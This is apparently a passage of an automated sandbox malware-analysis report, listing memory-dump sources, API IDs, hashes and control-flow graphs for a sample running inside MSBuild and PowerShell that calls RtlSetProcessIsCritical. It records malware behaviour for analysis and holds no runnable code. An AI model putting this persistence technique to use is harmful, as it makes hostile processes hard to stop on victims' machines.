                                                                                                                      • Instruction Fuzzy Hash: 3041FC35A0AB42C1EB50AB18F8983A5B3A4FB89B54FD04135EA8D83764DFBCE154C760
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$Prev$Next
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3260447230-0
                                                                                                                      • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                      • Instruction ID: a3edcfb0b0c71f2c558b05aaf2083ca2b7eba7dd0f527565c81594912ad444ec
                                                                                                                      • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                      • Instruction Fuzzy Hash: 76117762A1AA91C5FB515B11B50C1B9EB91E74DFE1F898374EA5E07784CFACD8408710
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 140117192-0
                                                                                                                      • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                                      • Instruction ID: f082983efa458c9db20a031698386d977d24c70c65210982dff5f876034125bf
                                                                                                                      • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                                      • Instruction Fuzzy Hash: C821D23590AB42C1E740AF44F8883A9B3B4FB88B54F900036EA8D43764DFBDE154C720
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2776232527-0
                                                                                                                      • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                                      • Instruction ID: 3464755c6397ff7a9a64c440a697d202e7f2dd80e6d0b927f4376adb7732ec4a
                                                                                                                      • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                                      • Instruction Fuzzy Hash: 56117772A19642D7E7A0AF24F448BB6FBA0FB99B55FC49134E64A42984DF7CD048CB10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2092150811.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                      • Instruction ID: 7f86d53ea597ce332b9a29b22ad167530dc4fcb183d9919e00ea7489049b19cc
                                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                      • Instruction Fuzzy Hash: C501A77020CB0C4FD748EF0CE451AA6B3E0FB85364F10056EE58AC36A1D632E882CB45

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:13%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:16
                                                                                                                      Total number of Limit Nodes:0
                                                                                                                      execution_graph 20613 12e1c6f 20614 12e1c84 20613->20614 20617 5fe9b40 20613->20617 20621 5fe9b31 20613->20621 20618 5fe9b5c 20617->20618 20625 5fe7e84 20618->20625 20622 5fe9b40 20621->20622 20623 5fe7e84 RtlSetProcessIsCritical 20622->20623 20624 5fe9bae 20623->20624 20624->20614 20626 5fe9c10 RtlSetProcessIsCritical 20625->20626 20628 5fe9bae 20626->20628 20628->20614 20629 12e1c31 20630 12e1c3e 20629->20630 20631 12e1bdf 20630->20631 20632 5fe9b40 RtlSetProcessIsCritical 20630->20632 20633 5fe9b31 RtlSetProcessIsCritical 20630->20633 20632->20631 20633->20631

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 98 12ee498-12ee4cc 101 12ee4ce-12ee4d7 98->101 102 12ee4da-12ee4ed 98->102 101->102 103 12ee75d-12ee761 102->103 104 12ee4f3-12ee4f6 102->104 106 12ee776-12ee780 103->106 107 12ee763-12ee773 103->107 108 12ee4f8-12ee4fd 104->108 109 12ee505-12ee511 104->109 107->106 108->109 110 12ee79b-12ee7e1 109->110 111 12ee517-12ee529 109->111 118 12ee7e3-12ee7ed 110->118 119 12ee7f0-12ee818 110->119 115 12ee52f-12ee582 111->115 116 12ee695-12ee6a3 111->116 147 12ee584-12ee590 call 12ee1d8 115->147 148 12ee592 115->148 122 12ee728-12ee72a 116->122 123 12ee6a9-12ee6b7 116->123 118->119 142 12ee81e-12ee837 119->142 143 12ee96d-12ee98b 119->143 129 12ee72c-12ee732 122->129 130 12ee738-12ee744 122->130 127 12ee6b9-12ee6be 123->127 128 12ee6c6-12ee6d2 123->128 127->128 128->110 133 12ee6d8-12ee707 128->133 131 12ee736 129->131 132 12ee734 129->132 138 12ee746-12ee757 130->138 131->130 132->130 150 12ee718-12ee726 133->150 151 12ee709-12ee716 133->151 138->103 138->104 158 12ee94e-12ee967 142->158 159 12ee83d-12ee853 142->159 162 12ee98d-12ee9af 143->162 163 12ee9f6-12eea00 143->163 152 12ee594-12ee5a4 147->152 148->152 150->103 151->150 164 12ee5bf-12ee5c1 152->164 165 12ee5a6-12ee5bd 152->165 158->142 158->143 159->158 182 12ee859-12ee8a7 159->182 178 12eea01-12eea52 call 12e9e38 162->178 179 12ee9b1-12ee9cd 162->179 168 12ee60a-12ee60c 164->168 169 12ee5c3-12ee5d1 164->169 165->164 171 12ee60e-12ee618 168->171 172 12ee61a-12ee62a 168->172 169->168 184 12ee5d3-12ee5e5 169->184 171->172 185 12ee663-12ee66f 171->185 186 12ee62c-12ee63a 172->186 187 12ee655-12ee65b call 12eede9 172->187 217 12eea54-12eea70 call 12e98e0 178->217 218 12eea72-12eeab0 call 12e8f78 * 3 178->218 193 12ee9f1-12ee9f4 179->193 228 12ee8a9-12ee8cf 182->228 229 12ee8d1-12ee8f5 182->229 195 12ee5eb-12ee5ef 184->195 196 12ee5e7-12ee5e9 184->196 185->138 198 12ee675-12ee690 185->198 202 12ee63c-12ee64b 186->202 203 12ee64d-12ee650 186->203 197 12ee661 187->197 193->163 199 12ee9db-12ee9de 193->199 201 12ee5f5-12ee604 195->201 196->201 197->185 198->103 199->178 205 12ee9e0-12ee9f0 199->205 201->168 212 12ee781-12ee794 201->212 202->185 203->103 205->193 212->110 217->218 228->229 241 12ee927-12ee940 229->241 242 12ee8f7-12ee90e 229->242 245 12ee94b 241->245 246 12ee942 241->246 248 12ee91a-12ee925 242->248 249 12ee910-12ee913 242->249 245->158 246->245 248->241 248->242 249->248
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^q$[c}q^
                                                                                                                      • API String ID: 0-1284671543
                                                                                                                      • Opcode ID: 46d7cc12521eab10347415e4c236f0504918a61d6526489810f5ac3ada7a46c6
                                                                                                                      • Instruction ID: 91cc3f899db4e6535be895bde9e089bae6ecbf2a94e4da5cceda162687c4ee9b
                                                                                                                      • Opcode Fuzzy Hash: 46d7cc12521eab10347415e4c236f0504918a61d6526489810f5ac3ada7a46c6
                                                                                                                      • Instruction Fuzzy Hash: 33129034B102158FDB14DF69D488AAEBBF6FF88700B558069E906EB365DB31EC41CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4a75b996c467965c76de47065fa2eb8907d1de89514aecb18575310ca83dfa48
                                                                                                                      • Instruction ID: 51a39c4902b54a47e05a307852cc491c6e10f70842b5642d5721bf94b768479a
                                                                                                                      • Opcode Fuzzy Hash: 4a75b996c467965c76de47065fa2eb8907d1de89514aecb18575310ca83dfa48
                                                                                                                      • Instruction Fuzzy Hash: A712CF74A01229CFDB65DF68D998B9DBBB2FF49300F1085A9D809A7364DB309E85CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5f29239fc6ff40cae9e1dd75500b610d482ce05d2ce1f8e540c06b82c155f64e
                                                                                                                      • Instruction ID: 513912a1b96b4015ef564313ad147c3422818e94242b2a83d6916a8bb78c8739
                                                                                                                      • Opcode Fuzzy Hash: 5f29239fc6ff40cae9e1dd75500b610d482ce05d2ce1f8e540c06b82c155f64e
                                                                                                                      • Instruction Fuzzy Hash: 5512CE74A01229CFDB65DF68D998B9DBBB2FB49300F1085A9D809A7364DB309E85CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3a0b339506133f6bd1a3e401aaa3d82e07f703f9368ebae5d7b5c40f512ea344
                                                                                                                      • Instruction ID: afdef09a137d8e03f482d6bec3af202a04a5986920e84cb29f10f3d8efc7c159
                                                                                                                      • Opcode Fuzzy Hash: 3a0b339506133f6bd1a3e401aaa3d82e07f703f9368ebae5d7b5c40f512ea344
                                                                                                                      • Instruction Fuzzy Hash: BEF1A174A00219CFDB65DF69D994B9DBBB2FF88300F1081AAD909A7364DB315A81DF50

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 409 12edca0-12edcb2 410 12edcdc-12edce0 409->410 411 12edcb4-12edcd5 409->411 412 12edcec-12edcfb 410->412 413 12edce2-12edce4 410->413 411->410 414 12edcfd 412->414 415 12edd07-12edd33 412->415 413->412 414->415 419 12edd39-12edd3f 415->419 420 12edf54-12edf9f 415->420 421 12ede08-12ede0c 419->421 422 12edd45-12edd4b 419->422 451 12edfb5-12edfc1 420->451 452 12edfa1 420->452 424 12ede0e-12ede17 421->424 425 12ede31-12ede3a 421->425 422->420 426 12edd51-12edd60 422->426 424->420 428 12ede1d-12ede2f 424->428 431 12ede5f-12ede62 425->431 432 12ede3c-12ede48 425->432 429 12edd66-12edd72 426->429 430 12edde7-12eddf0 426->430 434 12ede65-12ede6b 428->434 429->420 436 12edd78-12edd8f 429->436 430->420 435 12eddf6-12ede02 430->435 431->434 443 12ede50-12ede5c 432->443 434->420 438 12ede71-12ede86 434->438 435->421 435->422 439 12edd9b-12eddad 436->439 440 12edd91 436->440 438->420 442 12ede8c-12ede9e 438->442 439->430 446 12eddaf-12eddb5 439->446 440->439 442->420 445 12edea4-12edeb1 442->445 443->431 445->420 448 12edeb7-12edece 445->448 449 12eddb7 446->449 450 12eddc1-12eddc7 446->450 448->420 460 12eded4-12edeec 448->460 449->450 450->420 454 12eddcd-12edde4 450->454 455 12edfcd-12edfe9 451->455 456 12edfc3 451->456 453 12edfa4-12edfa6 452->453 458 12edfea-12ee027 453->458 459 12edfa8-12edfb3 453->459 456->455 472 12ee029-12ee02c 458->472 473 12ee043-12ee04f 458->473 459->451 459->453 460->420 461 12edeee-12edef9 460->461 464 12edf4a-12edf51 461->464 465 12edefb-12edf05 461->465 465->464 469 12edf07-12edf1d 465->469 474 12edf1f 469->474 475 12edf29-12edf42 469->475 476 12ee02f-12ee041 472->476 477 12ee05b-12ee080 473->477 478 12ee051 473->478 474->475 475->464 476->473 476->476 483 12ee0f4-12ee0fa 477->483 484 12ee082-12ee088 477->484 478->477 486 12ee0fc-12ee0ff 483->486 487 12ee147-12ee161 483->487 484->483 485 12ee08a-12ee08d 484->485 488 12ee164-12ee189 485->488 489 12ee093-12ee0a0 485->489 486->488 490 12ee101-12ee10e 486->490 501 12ee18b-12ee191 488->501 502 12ee197-12ee19b 488->502 492 12ee0ee-12ee0f2 489->492 493 12ee0a2-12ee0cc 489->493 494 12ee110-12ee128 490->494 495 12ee141-12ee145 490->495 492->483 492->485 496 12ee0ce 493->496 497 12ee0d8-12ee0eb 493->497 494->488 499 12ee12a-12ee13d 494->499 495->486 495->487 496->497 497->492 499->495 504 12ee195 501->504 505 12ee193 501->505 506 12ee19d-12ee1ad 502->506 507 12ee1c1-12ee1c6 502->507 504->502 505->502 506->507 509 12ee1af-12ee1c0 506->509
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (bq$d
                                                                                                                      • API String ID: 0-3334038649
                                                                                                                      • Opcode ID: e14ad19d1db3807f7f2f61a71dcc4c97c7880353b4df26a6cccdfad7b7a1257d
                                                                                                                      • Instruction ID: b09542edc6be64b33df7ac30851e1ef5da8097e49d327daf607062aa2b29cf53
                                                                                                                      • Opcode Fuzzy Hash: e14ad19d1db3807f7f2f61a71dcc4c97c7880353b4df26a6cccdfad7b7a1257d
                                                                                                                      • Instruction Fuzzy Hash: 000299347106068FDB20CF59C48496ABBF2FF88310B59C669E56A9B366DB30FC45CB90

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 603 5e41061-5e412cc 604 5e41315-5e4134e 603->604 605 5e412ce-5e41300 603->605 610 5e41354-5e414d9 call 5e406e8 604->610 607 5e41307-5e41313 605->607 608 5e41302 605->608 607->604 608->607 632 5e414e5 610->632 633 5e414db-5e414e4 610->633 635 5e414e6 632->635 633->632 635->635
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4138283630.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5e40000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Te^q
                                                                                                                      • API String ID: 0-671973202
                                                                                                                      • Opcode ID: d125a52ade07b3a6a5a913b0de60830313aaae66cf02d81e65bb1462d4d9a25d
                                                                                                                      • Instruction ID: 718d457885f463d544beecaa865afe1cd5a2884d48e88bf2d5c63c21c5687d7d
                                                                                                                      • Opcode Fuzzy Hash: d125a52ade07b3a6a5a913b0de60830313aaae66cf02d81e65bb1462d4d9a25d
                                                                                                                      • Instruction Fuzzy Hash: 7681B374E01208DFCB58DFA9D59499DBBF2BF89310F209169E845AB365DB31AC41CF50

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 636 12ea3f0-12ea403 637 12ea406-12ea42a 636->637 639 12ea570-12ea5ca 637->639 640 12ea430-12ea443 637->640 656 12ea5d4-12ea8be 639->656 641 12ea558-12ea562 640->641 642 12ea449-12ea44c 640->642 641->637 644 12ea568-12ea56f 641->644 643 12ea44f-12ea469 642->643 643->641 648 12ea46f-12ea471 643->648 649 12ea48b-12ea498 648->649 650 12ea473-12ea489 648->650 655 12ea49b-12ea4ef call 12e9760 649->655 650->655 667 12ea500 655->667 668 12ea4f1-12ea4fe 655->668 670 12ea502-12ea510 667->670 668->670 674 12ea53f 670->674 675 12ea512-12ea53d call 12e9918 670->675 677 12ea542-12ea552 674->677 675->677 677->641 677->643
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: c^q
                                                                                                                      • API String ID: 0-1660175743
                                                                                                                      • Opcode ID: ef901b4b20a620e699409814a55700ccc466cf3fc76329b14049ab6ec2b0e3f2
                                                                                                                      • Instruction ID: fc7991b013e79a02dbd661ff6399ab7065de35573827fa9284ddf66a6f0d60d7
                                                                                                                      • Opcode Fuzzy Hash: ef901b4b20a620e699409814a55700ccc466cf3fc76329b14049ab6ec2b0e3f2
                                                                                                                      • Instruction Fuzzy Hash: 9FE1AC70E40209AFEB05DFA4D885BEEBBB2FF88300F104459E605BB2A4DB75AD45CB51

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 717 5fe7e84-5fe9caf RtlSetProcessIsCritical 720 5fe9cb6-5fe9cde 717->720 721 5fe9cb1 717->721 721->720
                                                                                                                      APIs
                                                                                                                      • RtlSetProcessIsCritical.NTDLL(?,?), ref: 05FE9CA2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4139461506.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5fe0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2695349919-0
                                                                                                                      • Opcode ID: b4c33c9ea278849d49eeb0774decefa1b25d4bd5ef865b3c06620de9c195083c
                                                                                                                      • Instruction ID: 1149e3f07aef3a12e8fb6739308add96da6c6b763451f065d20045171d5a9607
                                                                                                                      • Opcode Fuzzy Hash: b4c33c9ea278849d49eeb0774decefa1b25d4bd5ef865b3c06620de9c195083c
                                                                                                                      • Instruction Fuzzy Hash: ED2178B2901259CFDB10DF9AD580BEEBBF4AF49320F14846AE445B3250C378AA44CFB5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 723 5fe9c08-5fe9c4c 724 5fe9c54-5fe9caf RtlSetProcessIsCritical 723->724 725 5fe9cb6-5fe9cde 724->725 726 5fe9cb1 724->726 726->725
                                                                                                                      APIs
                                                                                                                      • RtlSetProcessIsCritical.NTDLL(?,?), ref: 05FE9CA2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4139461506.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5fe0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2695349919-0
                                                                                                                      • Opcode ID: a8f579d25b4371db3dea97c3e7fa8784e37bb79cad43202542911db195bce184
                                                                                                                      • Instruction ID: c49a81d2db3082a9bbc9ba9964700dbb98c706c31b02abe3eb3d6adc06c99ba5
                                                                                                                      • Opcode Fuzzy Hash: a8f579d25b4371db3dea97c3e7fa8784e37bb79cad43202542911db195bce184
                                                                                                                      • Instruction Fuzzy Hash: 602139B6C01259CFDB14CF99D580BEEBBF4AF58320F14846AD495B3650D378AA44CF61
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4138283630.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5e40000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Te^q
                                                                                                                      • API String ID: 0-671973202
                                                                                                                      • Opcode ID: af609f955de56b11c417d742dc3aed144984d522ebcdf58d19a6bfd3a0e58926
                                                                                                                      • Instruction ID: a3286c1b81e48565a96182ac17de4659164ce3b695b3e26218f546c5e362a357
                                                                                                                      • Opcode Fuzzy Hash: af609f955de56b11c417d742dc3aed144984d522ebcdf58d19a6bfd3a0e58926
                                                                                                                      • Instruction Fuzzy Hash: DC81C674E05248CFDB05DFA9D99899DBBF2BF8A304F1590AAE805AB365D731AC01CF11
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4138283630.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5e40000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Te^q
                                                                                                                      • API String ID: 0-671973202
                                                                                                                      • Opcode ID: c094fa4f28797e8b2bf26badd35845b6f79de5491f754022766431d8656549e6
                                                                                                                      • Instruction ID: c438a475b70919afeac48d22f7db01988091706024a123acf66940a715089e3c
                                                                                                                      • Opcode Fuzzy Hash: c094fa4f28797e8b2bf26badd35845b6f79de5491f754022766431d8656549e6
                                                                                                                      • Instruction Fuzzy Hash: 0C71A278E01218DFDB58DFA9D59499DBBF2BF89300F209169E809AB365DB31AC41CF40
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4138283630.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_5e40000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Te^q
                                                                                                                      • API String ID: 0-671973202
                                                                                                                      • Opcode ID: 188f241bd68a8b93b179fd4366d4cdebae02e958e8ff8c5643491d1481441eef
                                                                                                                      • Instruction ID: b8a71220d06b15ea19418e65f1a47bdf8d5103b727f5e2beaa1c174ca1c3dbd5
                                                                                                                      • Opcode Fuzzy Hash: 188f241bd68a8b93b179fd4366d4cdebae02e958e8ff8c5643491d1481441eef
                                                                                                                      • Instruction Fuzzy Hash: 50717174E10218CFDB48DFA9D99899DBBF2FF89310F249169E805AB365DB31A801CF50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 0-2564639436
                                                                                                                      • Opcode ID: aef6ee797c7fbb0c94fe53732ab14fc6152ad34ab095a7df732778643d5a8031
                                                                                                                      • Instruction ID: fb45de195dc4f6bac56814addf2464e4b890538fb089637a3f454644b902fb19
                                                                                                                      • Opcode Fuzzy Hash: aef6ee797c7fbb0c94fe53732ab14fc6152ad34ab095a7df732778643d5a8031
                                                                                                                      • Instruction Fuzzy Hash: F3619A74A106068FCB15CF49C4C48AAFBF6FF88314B90C56AD91997715DB34F891CBA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 29e2b7685676ef3ca25b3ec59804b179ca950cad327a39280583cf86f603d92a
                                                                                                                      • Instruction ID: f39d98a9ac395c201ef0be31f7cb0ab9a7f8e05c684c1ae79d9c7b9e0afd8804
                                                                                                                      • Opcode Fuzzy Hash: 29e2b7685676ef3ca25b3ec59804b179ca950cad327a39280583cf86f603d92a
                                                                                                                      • Instruction Fuzzy Hash: 6DE23738A50219DFEB14EB60DC95FAE7B32FB89300F408499D90927398DB366D89DF51
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'^q
                                                                                                                      • API String ID: 0-1614139903
                                                                                                                      • Opcode ID: be8e413c2973f807c7edfec6ab5dc1017b6dc0e81da274c49e22320024af1f5c
                                                                                                                      • Instruction ID: 2afca85eb150af2c199885712168e4f3a3b8e118a5a2986165524c604ac22b0c
                                                                                                                      • Opcode Fuzzy Hash: be8e413c2973f807c7edfec6ab5dc1017b6dc0e81da274c49e22320024af1f5c
                                                                                                                      • Instruction Fuzzy Hash: AFF0AF363402058FC619EA69E855BAEB7EAEFC93807144569C1068B718FE34ED4A87A1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'^q
                                                                                                                      • API String ID: 0-1614139903
                                                                                                                      • Opcode ID: 5a2451a3a75b58db945616f27771ee1d5610778a21101c7c2a30dbf103f7fae6
                                                                                                                      • Instruction ID: 07a49c662e217eee28c1165c9fb83b04c84fd99d290d15ccbf81353a752df7fb
                                                                                                                      • Opcode Fuzzy Hash: 5a2451a3a75b58db945616f27771ee1d5610778a21101c7c2a30dbf103f7fae6
                                                                                                                      • Instruction Fuzzy Hash: 2BD0A7321055108FD70DA734F4186DA3691EF46300B0805AD904147658CB541C494795
                                                                                                                      Memory Dump Source
